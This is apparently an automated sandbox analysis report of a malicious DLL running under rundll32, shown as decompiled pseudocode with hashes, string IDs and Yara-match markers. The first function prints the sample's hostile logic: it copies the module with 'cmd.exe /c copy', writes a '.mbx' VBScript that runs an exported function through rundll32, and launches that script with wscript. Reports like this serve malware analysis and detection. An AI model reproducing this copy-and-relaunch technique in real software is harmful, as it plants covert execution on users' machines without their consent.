                				 *((char*)(_t432 + 0x48)) = 0;
                				if ( *((long long*)(_t474 + 0x10)) != 0) goto 0x205881c7;
                				r8d = 0x208;
                				E00000215215205F8EF0(_t189, 0, 1, _t254, _t432 + 0x2b0, ".dll", _t425, _t475);
                				r8d = 0x208;
                				GetModuleFileNameA(??, ??, ??);
                				goto 0x205881e3;
                				_t304 = _t432 + 0x48;
                				if (_t304 == _t474) goto 0x205881e3;
                				r8d = 0;
                				E0000021521520586C40(_t314, _t432 + 0x48, _t474, _t425, _t430, _t475, _t461 | 0xffffffff);
                				 *((long long*)(_t432 - 0x20)) = __r12;
                				 *((long long*)(_t432 - 0x18)) = __r12;
                				 *((long long*)(_t432 - 0x18)) = 0xf;
                				 *((long long*)(_t432 - 0x20)) = __r12;
                				 *((char*)(_t432 - 0x30)) = 0;
                				r8d = 6;
                				E0000021521520586B10(_t314, _t432 - 0x30, "\"copy ", _t430, _t475);
                				r8d = r8d ^ r8d;
                				E0000021521520588D60(_t314, _t432 - 0x30, _t432 + 0x48, _t425, _t430, _t432, _t475, _t461 | 0xffffffffffffffff);
                				E0000021521520588C10(_t314, _t432 - 0x30, " ", _t425, _t432, _t425);
                				r8d = 0;
                				E0000021521520588D60(_t314, _t432 - 0x30, _t432 + 0x88, _t425, _t430, _t432, _t425, _t461 | 0xffffffffffffffff);
                				E0000021521520588C10(_t314, _t432 - 0x30, "\"", _t425, _t432, _t425);
                				_t203 = E00000215215205893D0(_t314, _t434 + 0x48, "cmd.exe /c ", _t430, _t432, _t432 - 0x30, _t461 | 0xffffffffffffffff);
                				if ( *((long long*)(_t304 + 0x18)) - 0x10 < 0) goto 0x20588283;
                				_t305 =  *_t304;
                				_t250 = E00000215215205CB510(_t203, _t189, _t314, _t305, "cmd.exe /c ");
                				E0000021521520586820(_t204, 0, _t434 + 0x48);
                				if (_t250 == 0) goto 0x205882a2;
                				_t241 = _t250;
                				0x20587e80();
                				r8d = 0x200;
                				E00000215215205F8EF0(_t241, 0, _t250, _t254, _t432 + 0xb0, "cmd.exe /c ", _t425, _t432 - 0x30);
                				 *((intOrPtr*)(_t432 - 0x58)) = 0x100;
                				GetUserNameW(??, ??);
                				E0000021521520589490(_t314, _t432 + 0x68, _t434 + 0x68, _t430, _t432, "\\", _t461 | 0xffffffffffffffff);
                				E00000215215205895D0(_t432 - 0x78, _t305, _t425, _t430, _t432, _t475, _t461 | 0xffffffffffffffff);
                				E0000021521520586820(E0000021521520586820(E0000021521520589550(_t432 - 0x10, _t305, _t425, _t432, ".mbx"), _t241, _t432 - 0x78), _t241, _t432 + 0x68);
                				 *((long long*)(_t434 + 0x58)) = __r12;
                				 *((long long*)(_t434 + 0x60)) = __r12;
                				 *((long long*)(_t434 + 0x60)) = 7;
                				 *((long long*)(_t434 + 0x58)) = __r12;
                				 *((intOrPtr*)(_t434 + 0x48)) = r12w;
                				r8d = 0xb;
                				E0000021521520588AC0(_t314, _t434 + 0x48, L"wscript.exe", _t430, ".mbx");
                				E00000215215205893D0(_t314, _t432 + 0x68, "/E:vbscript ", _t430, _t432, _t432 - 0x10, _t461 | 0xffffffffffffffff);
                				if ( *((long long*)(_t305 + 0x18)) - 0x10 < 0) goto 0x20588370;
                				_t306 =  *_t305;
                				 *((long long*)(_t434 + 0x30)) = _t434 + 0x48;
                				E0000021521520586820(E00000215215205C6780(_t237, _t241, _t189, _t314, "/E:vbscript ", _t425, _t430, _t432 + 0xb0, _t306, _t469, _t474), _t241, _t432 + 0x68);
                				if ( *((intOrPtr*)(_t434 + 0x60)) - 8 < 0) goto 0x205883b1;
                				E0000021521520588F90(0, _t314,  *((intOrPtr*)(_t434 + 0x48)), _t425, _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1, _t306);
                				 *((long long*)(_t434 + 0x60)) = 7;
                				 *((long long*)(_t434 + 0x58)) = __r12;
                				 *((intOrPtr*)(_t434 + 0x48)) = r12w;
                				 *(_t432 - 0x40) = __r12;
                				 *((long long*)(_t432 - 0x38)) = __r12;
                				 *((long long*)(_t432 - 0x38)) = 0xf;
                				 *(_t432 - 0x40) = __r12;
                				 *((char*)(_t432 - 0x50)) = 0;
                				r8d = 0x6b;
                				E0000021521520586B10(_t314, _t432 - 0x50, "Set objShell = CreateObject(\"Wscript.Shell\")\r\nobjShell.Run \"rundll32.exe my_application_path, LLBMPMUsqf\"\r\n", _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1);
                				 *((long long*)(_t432 - 0x68)) = __r12;
                				 *((long long*)(_t432 - 0x60)) = __r12;
                				 *((long long*)(_t432 - 0x60)) = 0xf;
                				 *((long long*)(_t432 - 0x68)) = __r12;
                				 *((char*)(_t432 - 0x78)) = 0;
                				r8d = 0x13;
                				_t219 = E0000021521520586B10(_t314, _t432 - 0x78, "my_application_path", _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1);
                				_t416 =  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78;
                				r8d = 0;
                				E0000021521520586A20(_t219, _t432 - 0x50,  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78,  *((intOrPtr*)(_t434 + 0x60)) + 1,  *((intOrPtr*)(_t432 - 0x68)));
                				if (_t306 == 0xffffffff) goto 0x2058849d;
                				asm("o16 nop [eax+eax]");
                				 *((long long*)(_t434 + 0x28)) = 0xffffffff;
                				 *((long long*)(_t434 + 0x20)) = __r12;
                				_t221 = E0000021521520589920(_t432 - 0x50, _t306, _t306,  *((intOrPtr*)(_t432 - 0x68)), _t432 + 0x88, __r12, _t473, _t475);
                				_t419 =  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78;
                				_t222 = E0000021521520586A20(_t221, _t432 - 0x50,  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78,  *((intOrPtr*)(_t432 - 0x68)) + _t306,  *((intOrPtr*)(_t432 - 0x68)));
                				if (_t306 != 0xffffffff) goto 0x20588450;
                				E0000021521520586820(_t222, _t241, _t432 - 0x78);
                				_t421 =  >=  ?  *((void*)(_t432 - 0x50)) : _t432 - 0x50;
                				_t368 =  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10;
                				r8d =  *(_t432 - 0x40);
                				E00000215215205CA9C8(_t306, _t314,  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10,  >=  ?  *((void*)(_t432 - 0x50)) : _t432 - 0x50, _t430,  *((intOrPtr*)(_t432 - 0x68)));
                				E00000215215205893D0(_t314, _t432 + 0x68, "wscript.exe /E:vbscript ", _t430, _t432, _t432 - 0x10,  *((intOrPtr*)(_t432 - 0x68)));
                				E0000021521520586820(E0000021521520588900(_t241, _t314, _t432 - 0x10, _t306), _t241, _t432 + 0x68);
                				_t372 =  *0x206832c8; // 0x0
                				if (_t372 == 0) goto 0x2058850f;
                				_t228 = CloseHandle(??);
                				 *0x206832c8 = _t471;
                				_t374 =  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10;
                				E0000021521520586820(E0000021521520586820(E0000021521520586820(E0000021521520586820(E0000021521520586820(E0000021521520586820(E00000215215205CB510(_t228, _t189, _t314,  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10, _t306), _t241, _t432 - 0x50), _t241, _t432 - 0x10), _t241, _t432 - 0x30), _t241, _t432 + 0x48), _t241, _t432 + 0x88), _t241, _t432 + 0x10);
                				_t307 =  *((intOrPtr*)(_t432 - 0x80));
                				if (_t307 - 0x10 < 0) goto 0x205885bd;
                				_t381 =  *((intOrPtr*)(_t434 + 0x68));
                				if (_t307 + 1 - 0x1000 < 0) goto 0x205885b8;
                				if ((_t241 & 0x0000001f) == 0) goto 0x2058858b;
                				0x205faadc();
                				asm("int3");
                				_t309 =  *((intOrPtr*)(_t381 - 8));
                				if (_t309 - _t381 < 0) goto 0x2058859a;
                				0x205faadc();
                				asm("int3");
                				_t382 = _t381 - _t309;
                				if (_t382 - 8 >= 0) goto 0x205885a9;
                				0x205faadc();
                				asm("int3");
                				if (_t382 - 0x27 <= 0) goto 0x205885b5;
                				0x205faadc();
                				asm("int3");
                				0x205f51e4();
                				 *((long long*)(_t432 - 0x80)) = 0xf;
                				 *(_t434 + 0x78) = _t471;
                				 *((char*)(_t434 + 0x68)) = 0;
                				if (_t314 == 0) goto 0x2058862f;
                				if ( *(_t432 + 0x40) - _t314 - 0x1000 < 0) goto 0x2058861b;
                				if ((_t237 & 0x0000001f) == 0) goto 0x205885ee;
                				0x205faadc();
                				asm("int3");
                				_t312 =  *((intOrPtr*)(_t314 - 8));
                				if (_t312 - _t314 < 0) goto 0x205885fd;
                				0x205faadc();
                				asm("int3");
                				_t315 = _t314 - _t312;
                				if (_t315 - 8 >= 0) goto 0x2058860c;
                				0x205faadc();
                				asm("int3");
                				if (_t315 - 0x27 <= 0) goto 0x20588618;
                				0x205faadc();
                				asm("int3");
                				0x205f51e4();
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [ebp+0x30], xmm0");
                				 *(_t432 + 0x40) = _t471;
                				return 3;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FolderPathSpecial
                • String ID: "copy $"mkdir $.dll$.mbx$/E:vbscript $Set objShell = CreateObject("Wscript.Shell")objShell.Run "rundll32.exe my_application_path, LLBMPMUsqf"$cmd.exe /c $my_application_path$wscript.exe$wscript.exe /E:vbscript
                • API String ID: 994120019-2262109626
                • Opcode ID: b2a2ead585b8c65e9c79336ff782dd2f481bb5d4a3e724b700016a1cd6d63441
                • Instruction ID: 92f15904107da15f9026db128adbbbf844cfb93e0208dd9b1db3b2e5fe568829
                • Opcode Fuzzy Hash: b2a2ead585b8c65e9c79336ff782dd2f481bb5d4a3e724b700016a1cd6d63441
                • Instruction Fuzzy Hash: D5228A33302E64D5EB10EB64D8487ED27A1FBA17A8F901651EE6957AEEDF38C584C340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00007FFA7FFA535EB2BC(void* __ecx, void* __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, void* __r9, long long _a8, signed long long _a16, signed int _a24) {
                				void* __rdi;
                				void* __rsi;
                				void* _t28;
                				intOrPtr _t38;
                				void* _t40;
                				void* _t42;
                				void* _t47;
                				void* _t48;
                				void* _t51;
                				signed long long _t56;
                				void* _t64;
                				intOrPtr* _t79;
                				signed long long _t81;
                				long long* _t82;
                				intOrPtr* _t84;
                				char* _t85;
                				intOrPtr* _t86;
                				char* _t87;
                				void* _t88;
                				char* _t89;
                				void* _t90;
                				intOrPtr* _t91;
                				signed long long _t98;
                				signed long long _t103;
                				signed long long _t117;
                				signed long long _t120;
                				signed long long _t121;
                				intOrPtr* _t124;
                				void* _t126;
                
                				_t79 = __rax;
                				_a8 = __rbx;
                				_t84 = __rcx;
                				E00007FFA7FFA535EAA38(_t28);
                				r14d = 0;
                				_a16 = r14d;
                				_t124 = _t79;
                				_a24 = r14d;
                				E00007FFA7FFA535EAAA0(__edx, _t79,  &_a16);
                				if (_t79 != 0) goto 0x535eb4f5;
                				E00007FFA7FFA535EAA40(__edx, _t79,  &_a24);
                				if (_t79 != 0) goto 0x535eb4e0;
                				_t98 =  *0x53755278; // 0x0
                				_t56 = _t98;
                				if (_t56 == 0) goto 0x535eb339;
                				r9d = __rcx[_t98 - __rcx] & 0x000000ff;
                				_t51 = __edx - r9d;
                				if (_t56 != 0) goto 0x535eb331;
                				_t81 =  &(__rcx[1]);
                				if (r9d != 0) goto 0x535eb31c;
                				if (( *__rcx & 0x000000ff) == 0) goto 0x535eb490;
                				E00007FFA7FFA535E7E58(_t81, _t98);
                				_t121 = _t120 | 0xffffffff;
                				if ( *((intOrPtr*)(_t84 + _t121 + 1)) != r14b) goto 0x535eb345;
                				E00007FFA7FFA535E7E98(_t81, _t121 + 2);
                				 *0x53755278 = _t81;
                				E00007FFA7FFA535E7E58(_t81, 0);
                				_t103 =  *0x53755278; // 0x0
                				if (_t103 == 0) goto 0x535eb490;
                				_t122 = _t121 + 1;
                				if ( *((intOrPtr*)(_t84 + _t121 + 1)) != r14b) goto 0x535eb374;
                				E00007FFA7FFA535E7EF8(_t81, _t103, _t121 + 2, _t84);
                				if (_t81 != 0) goto 0x535eb4cb;
                				_t10 = _t81 + 3; // 0x3
                				r13d = _t10;
                				r9d = r13d;
                				_t11 = _t81 + 0x40; // 0x40
                				E00007FFA7FFA535F1998(_t51, _t81, _t84,  *_t124, _t11, __r9);
                				if (_t81 != 0) goto 0x535eb4b6;
                				_t64 =  *_t84 - r14b;
                				if (_t64 == 0) goto 0x535eb3bf;
                				_t85 = _t84 + 1;
                				if (_t64 != 0) goto 0x535eb3b1;
                				dil =  *_t85 == 0x2d;
                				if (dil == 0) goto 0x535eb3ce;
                				_t86 = _t85 + 1;
                				E00007FFA7FFA535E8028(_t81, _t86, _t86, _t122 - 1, _t124, __r9);
                				_a16 = _t81 * 0xe10;
                				_t38 =  *_t86;
                				if (_t38 == 0x2b) goto 0x535eb3eb;
                				if (_t38 - 0x30 - 9 > 0) goto 0x535eb3f0;
                				_t87 = _t86 + 1;
                				goto 0x535eb3df;
                				if ( *_t87 != 0x3a) goto 0x535eb441;
                				_t88 = _t87 + 1;
                				_t40 = E00007FFA7FFA535E8028(_t81, _t88, _t88, _t122 - 1, _t124, __r9);
                				_a16 = _a16 + _t81 * 0x3c;
                				goto 0x535eb414;
                				if (_t40 - 0x39 > 0) goto 0x535eb41a;
                				_t89 = _t88 + 1;
                				if ( *_t89 - 0x30 >= 0) goto 0x535eb40d;
                				if ( *_t89 != 0x3a) goto 0x535eb441;
                				_t90 = _t89 + 1;
                				_t42 = E00007FFA7FFA535E8028(_t81, _t90, _t90, _t122 - 1, _t124, __r9);
                				_t117 = _a16 + _t81;
                				_a16 = _t117;
                				goto 0x535eb43b;
                				if (_t42 - 0x39 > 0) goto 0x535eb441;
                				_t91 = _t90 + 1;
                				if ( *_t91 - 0x30 >= 0) goto 0x535eb434;
                				if (dil == 0) goto 0x535eb44b;
                				_a16 =  ~_t117;
                				_a24 = _t81;
                				if (_t81 == 0) goto 0x535eb475;
                				 *((intOrPtr*)(_t126 - 0x14f68b40)) =  *((intOrPtr*)(_t126 - 0x14f68b40)) + (r14d & 0xffffff00 |  *_t91 != r14b);
                				_t82 =  *((intOrPtr*)(_t124 + 8));
                				 *_t82 = r14b;
                				_t47 = E00007FFA7FFA535EAA30((r14d & 0xffffff00 |  *_t91 != r14b) - 0x48);
                				 *_t82 = _a16;
                				_t48 = E00007FFA7FFA535EAA20(_t47);
                				 *_t82 = _a24;
                				return _t48;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                • String ID: -$:$:$?
                • API String ID: 3440502458-92861585
                • Opcode ID: a800f810628b4c4f7b106cf84e93ca30267a0bac2c5ec4204c3e996c6b5a40af
                • Instruction ID: 756c227052dadb24578371188295bad3d939e5f8e6516c62854f8c487d6c8fc2
                • Opcode Fuzzy Hash: a800f810628b4c4f7b106cf84e93ca30267a0bac2c5ec4204c3e996c6b5a40af
                • Instruction Fuzzy Hash: 22E11532A2CB824EE764CF3194416B9276BFFC6784F4CA175EA4E62A95DF3CE4419700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _fdexp_fdlogpoly
                • String ID:
                • API String ID: 4114727879-0
                • Opcode ID: 2849e88e75b85d9acbfc01c0a23c984c94bd6e59bb1f6be8716bfb0e62402709
                • Instruction ID: 5f67408cdf0219c8606eb718ec710c0152b2bcaedf3093fcc1713914f08f279c
                • Opcode Fuzzy Hash: 2849e88e75b85d9acbfc01c0a23c984c94bd6e59bb1f6be8716bfb0e62402709
                • Instruction Fuzzy Hash: 31021626E28F4689F6229B3684410B96367AFEF344F1CE771ED4D324E5EF2CB545A600
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E0000021521520613DE8(void* __ecx, void* __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, void* __r9, long long _a8, signed int _a16, signed int _a24) {
                				void* __rdi;
                				void* __rsi;
                				void* _t26;
                				signed char _t36;
                				signed int _t38;
                				void* _t40;
                				signed int _t43;
                				void* _t45;
                				void* _t46;
                				signed int _t60;
                				signed char* _t67;
                				void* _t75;
                				intOrPtr* _t90;
                				signed char* _t92;
                				signed int* _t93;
                				signed char* _t96;
                				signed char* _t97;
                				signed char* _t98;
                				signed char* _t99;
                				signed char* _t100;
                				signed char* _t101;
                				signed char* _t102;
                				signed char* _t107;
                				signed char* _t111;
                				signed long long _t118;
                				signed long long _t119;
                				intOrPtr* _t122;
                				void* _t134;
                
                				_t90 = __rax;
                				_a8 = __rbx;
                				E0000021521520613D50(_t26);
                				r14d = 0;
                				_a16 = r14d;
                				_t122 = _t90;
                				_a24 = r14d;
                				if (E0000021521520613DB8(__edx, _t90,  &_a16) != 0) goto 0x20614021;
                				if (E0000021521520613D58(__edx, _t90,  &_a24) != 0) goto 0x2061400c;
                				_t107 =  *0x20682f98; // 0x0
                				_t67 = _t107;
                				if (_t67 == 0) goto 0x20613e65;
                				r9d = __rcx[_t107 - __rcx] & 0x000000ff;
                				if (_t67 != 0) goto 0x20613e5d;
                				_t92 =  &(__rcx[1]);
                				if (r9d != 0) goto 0x20613e48;
                				if (( *__rcx & 0x000000ff) - r9d == 0) goto 0x20613fbc;
                				E000002152152060A780(_t92, _t107);
                				_t119 = _t118 | 0xffffffff;
                				if (__rcx[_t119 + 1] != r14b) goto 0x20613e71;
                				E0000021521520603D7C(_t92, _t119 + 2);
                				 *0x20682f98 = _t92;
                				E000002152152060A780(_t92, _t119 + 2);
                				_t111 =  *0x20682f98; // 0x0
                				if (_t111 == 0) goto 0x20613fbc;
                				_t120 = _t119 + 1;
                				if (__rcx[_t119 + 1] != r14b) goto 0x20613ea0;
                				if (E000002152152060BDB0(( *__rcx & 0x000000ff) - r9d, _t92, _t111, _t119 + 2, __rcx) != 0) goto 0x20613ff7;
                				_t10 =  &(_t92[3]); // 0x3
                				r13d = _t10;
                				r9d = r13d;
                				_t11 =  &(_t92[0x40]); // 0x40
                				if (E000002152152060E758(_t11, _t92, __rcx,  *_t122, _t119 + 2, __r9) != 0) goto 0x20613fe2;
                				_t75 =  *__rcx - r14b;
                				if (_t75 == 0) goto 0x20613eeb;
                				_t96 =  &(__rcx[1]);
                				if (_t75 != 0) goto 0x20613edd;
                				dil =  *_t96 == 0x2d;
                				if (dil == 0) goto 0x20613efa;
                				_t97 =  &(_t96[1]);
                				_a16 = E000002152152060BE3C(_t11, _t92, _t97, _t97, _t120 - 1, _t122, __r9) * 0xe10;
                				_t36 =  *_t97;
                				if (_t36 == 0x2b) goto 0x20613f17;
                				if (_t36 - 0x30 - 9 > 0) goto 0x20613f1c;
                				_t98 =  &(_t97[1]);
                				goto 0x20613f0b;
                				if ( *_t98 != 0x3a) goto 0x20613f6d;
                				_t99 =  &(_t98[1]);
                				_t38 = E000002152152060BE3C(E000002152152060BE3C(_t11, _t92, _t97, _t97, _t120 - 1, _t122, __r9) * 0xe10, _t92, _t99, _t99, _t120 - 1, _t122, __r9);
                				_a16 = _a16 + _t38 * 0x3c;
                				goto 0x20613f40;
                				if (_t38 - 0x39 > 0) goto 0x20613f46;
                				_t100 =  &(_t99[1]);
                				if ( *_t100 - 0x30 >= 0) goto 0x20613f39;
                				if ( *_t100 != 0x3a) goto 0x20613f6d;
                				_t101 =  &(_t100[1]);
                				_t40 = E000002152152060BE3C(_a16 + _t38 * 0x3c, _t92, _t101, _t101, _t120 - 1, _t122, __r9);
                				_t60 = _a16 + _t40;
                				_a16 = _t60;
                				goto 0x20613f67;
                				if (_t40 - 0x39 > 0) goto 0x20613f6d;
                				_t102 =  &(_t101[1]);
                				if ( *_t102 - 0x30 >= 0) goto 0x20613f60;
                				if (dil == 0) goto 0x20613f77;
                				_a16 =  ~_t60;
                				_t43 = r14d & 0xffffff00 |  *_t102 != r14b;
                				_a24 = _t43;
                				if (_t43 == 0) goto 0x20613fa1;
                				if (E000002152152060E758(0x40, _t92, _t102,  *((intOrPtr*)(_t122 + 8)), _t119 + 2, _t134) == 0) goto 0x20613fa8;
                				goto 0x20613fcd;
                				_t93 =  *((intOrPtr*)(_t122 + 8));
                				 *_t93 = r14b;
                				_t45 = E0000021521520613D48(_t44);
                				 *_t93 = _a16;
                				_t46 = E0000021521520613D38(_t45);
                				 *_t93 = _a24;
                				return _t46;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                • String ID: ?
                • API String ID: 3440502458-1684325040
                • Opcode ID: b8f6f4bd453aa2ffabf6e2e221d464ce7bf9b3bb3860973c7510e40774486b0d
                • Instruction ID: b9f88b97b987dc880846a6b96101ed5860e6882070f29c14027fe5d848f8c27d
                • Opcode Fuzzy Hash: b8f6f4bd453aa2ffabf6e2e221d464ce7bf9b3bb3860973c7510e40774486b0d
                • Instruction Fuzzy Hash: 2BE1D433601AB0CAEF749F31A8497DAABA1FFE4784F685155EE4A43B9DCB38D4418700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E00000215215205940F0(intOrPtr __edx, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __r8, void* __r9) {
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				signed int _t134;
                				int _t139;
                				long _t176;
                				void* _t184;
                				signed int _t191;
                				signed int _t239;
                				signed int _t244;
                				void* _t245;
                				signed int _t246;
                				void* _t249;
                				long long _t250;
                				long long _t252;
                				struct _CRITICAL_SECTION* _t253;
                				intOrPtr* _t259;
                				intOrPtr* _t261;
                				long long* _t263;
                				struct _CRITICAL_SECTION* _t264;
                				intOrPtr _t269;
                				signed int _t304;
                				struct _CRITICAL_SECTION* _t313;
                				void* _t314;
                				long _t316;
                				signed int _t318;
                				signed int _t319;
                				void* _t322;
                				void** _t323;
                				void* _t325;
                				void* _t326;
                				long _t338;
                				LARGE_INTEGER* _t341;
                				void* _t344;
                				struct _CRITICAL_SECTION* _t346;
                
                				 *((intOrPtr*)(_t325 + 0x10)) = __edx;
                				_t323 = _t325 - 0x40;
                				_t326 = _t325 - 0x140;
                				_t323[2] = 0xfffffffe;
                				 *((long long*)(_t326 + 0x190)) = __rbx;
                				_t314 = __rcx;
                				r15d = 1;
                				r14d = 0;
                				asm("lock inc esp");
                				if (__eflags != 0) goto 0x205942a0;
                				_t5 = _t314 + 0x60; // 0x61
                				_t323[6] = _t5;
                				EnterCriticalSection(_t346);
                				_t323[8] = 1;
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [esp+0x30], xmm0");
                				_t239 =  *(__rcx + 0x90);
                				if (_t239 == 0) goto 0x20594198;
                				_t269 =  *((intOrPtr*)(_t326 + 0x38));
                				if (_t269 == 0) goto 0x20594179;
                				 *(_t269 + 0x20) = _t239;
                				goto 0x2059417e;
                				 *(_t326 + 0x30) = _t239;
                				 *((long long*)(_t326 + 0x38)) =  *(__rcx + 0x98);
                				 *(__rcx + 0x90) = _t344;
                				 *(__rcx + 0x98) = _t344;
                				_t259 =  *((intOrPtr*)(__rcx + 0x88));
                				if (_t259 == 0) goto 0x205941c7;
                				 *((intOrPtr*)( *_t259 + 0x20))();
                				if ( *((intOrPtr*)(_t259 + 8)) != 0) goto 0x205941b0;
                				E0000021521520593FE0( *((intOrPtr*)(_t259 + 8)), __rcx, _t326 + 0x30, _t5, _t323);
                				if ( *((long long*)(_t314 + 0x48)) == 0) goto 0x20594241;
                				_t261 =  *((intOrPtr*)(_t314 + 0x88));
                				if (_t261 == 0) goto 0x20594241;
                				_t134 =  *((intOrPtr*)( *_t261 + 0x18))();
                				if ( *((intOrPtr*)(_t261 + 8)) != 0) goto 0x205941f0;
                				if (_t134 - 0x11e1a300 >= 0) goto 0x20594241;
                				 *((long long*)(_t326 + 0x58)) =  ~_t134 +  ~_t134 * 4 +  ~_t134 +  ~_t134 * 4;
                				 *(_t326 + 0x28) = r14d;
                				 *(_t326 + 0x20) = _t344;
                				r9d = 0;
                				r8d = 0x493e0;
                				SetWaitableTimer(_t344, _t341, _t338);
                				_t304 =  *(_t326 + 0x30);
                				if (_t304 == 0) goto 0x20594297;
                				_t244 =  *(_t304 + 0x20);
                				 *(_t326 + 0x30) = _t244;
                				_t277 =  ==  ? _t344 :  *((intOrPtr*)(_t326 + 0x38));
                				 *((long long*)(_t326 + 0x38)) =  ==  ? _t344 :  *((intOrPtr*)(_t326 + 0x38));
                				 *(_t304 + 0x20) = _t344;
                				 *(_t323 - 0x10) = _t244;
                				 *(_t323 - 8) = _t244;
                				 *_t323 = _t344;
                				r9d = 0;
                				 *((intOrPtr*)(_t304 + 0x28))();
                				if ( *(_t326 + 0x30) != 0) goto 0x2059424e;
                				LeaveCriticalSection(_t313);
                				_t323[0x22] = r14d;
                				_t323[0x20] = _t344;
                				 *(_t326 + 0x60) = _t344;
                				SetLastError(_t316);
                				 *(_t326 + 0x20) =  *(_t314 + 0x40);
                				_t139 = GetQueuedCompletionStatus(_t322, ??, ??, ??);
                				r14d = GetLastError();
                				_t263 =  *(_t326 + 0x60);
                				if (_t263 == 0) goto 0x2059444a;
                				E000002152152058F380( *((intOrPtr*)(_t314 + 0x28)),  &(_t323[0x22]));
                				_t318 = _t244;
                				 *(_t326 + 0x40) = _t244;
                				 *(_t326 + 0x48) = _t244;
                				if ( *((intOrPtr*)(_t318 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059433b;
                				_t245 =  *_t318;
                				 *((intOrPtr*)(_t245 + 0x30))();
                				goto 0x20594341;
                				_t246 = _t245 + 2;
                				 *(_t326 + 0x50) = _t246;
                				 *(_t326 + 0x40) = r14d;
                				 *(_t326 + 0x48) = _t318;
                				if (_t323[0x20] != 2) goto 0x205943cc;
                				_t319 =  *_t263;
                				r14d =  *(_t263 + 0x10);
                				 *(_t326 + 0x68) = _t246;
                				 *(_t326 + 0x70) = _t246;
                				if ( *((intOrPtr*)(_t319 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059438f;
                				_t249 =  *_t319;
                				 *((intOrPtr*)(_t249 + 0x30))();
                				goto 0x20594395;
                				_t250 = _t249 + 2;
                				 *((long long*)(_t326 + 0x78)) = _t250;
                				 *(_t326 + 0x68) = r14d;
                				 *(_t326 + 0x70) = _t319;
                				asm("movups xmm0, [esp+0x68]");
                				asm("movups [esp+0x40], xmm0");
                				asm("movsd xmm1, [esp+0x78]");
                				asm("movsd [esp+0x50], xmm1");
                				_t323[0x22] =  *(_t263 + 0x14);
                				goto 0x20594438;
                				if (_t250 != 0) goto 0x205943d8;
                				E000002152152058F380(_t319, 0xda812030);
                				goto 0x205943e3;
                				if (_t250 != 1) goto 0x205943e6;
                				E000002152152058FD30(_t319, 0xda812030);
                				 *_t263 = _t250;
                				if ( *(_t326 + 0x50) == 1) goto 0x205943f7;
                				goto 0x2059442c;
                				_t191 =  *(_t326 + 0x48);
                				 *(_t263 + 0x10) = _t191 * 0x3e8 +  *(_t326 + 0x40);
                				 *(_t263 + 0x14) = _t323[0x22];
                				asm("lock inc esp");
                				if (0 == 1) goto 0x2059448f;
                				goto 0x2059412a;
                				if (_t139 != 0) goto 0x20594460;
                				if (r14d != 0x102) goto 0x20594525;
                				goto 0x2059412a;
                				r14d = 0;
                				if (_t323[0x20] == 1) goto 0x20594130;
